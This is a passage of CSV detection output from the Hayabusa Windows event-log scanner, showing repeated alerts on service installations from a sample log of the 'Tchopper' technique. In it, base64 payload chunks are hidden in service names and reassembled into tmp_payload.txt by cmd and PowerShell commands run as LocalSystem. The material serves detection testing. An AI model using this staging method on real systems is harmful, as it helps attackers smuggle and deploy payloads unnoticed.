""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
